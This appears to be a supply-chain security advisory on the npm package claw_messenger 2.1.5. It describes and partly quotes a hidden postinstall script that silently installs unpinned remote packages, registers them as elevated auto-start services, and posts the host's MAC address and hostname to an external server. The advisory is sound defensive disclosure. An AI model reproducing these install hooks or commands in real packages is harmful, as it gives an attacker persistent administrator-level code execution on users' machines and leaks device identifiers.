claw_messenger @2.1.5

Summary

The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install . (1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate. (2) An update-silent-service flow loads dist/service-installer.js which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag, then dist/daemon-manager.js elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs , on Linux via systemd with pkexec / sudo , on macOS via osascript... with administrator privileges . The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises opencode-ai or claw-subagent-service ) persistent root/Administrator code execution on every machine that installs claw_messenger. Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.

Source: amazon-inspector (b621afa50fe31026a12750b83eeb309366f95b07a9e0c5095d3e862f0007b70f)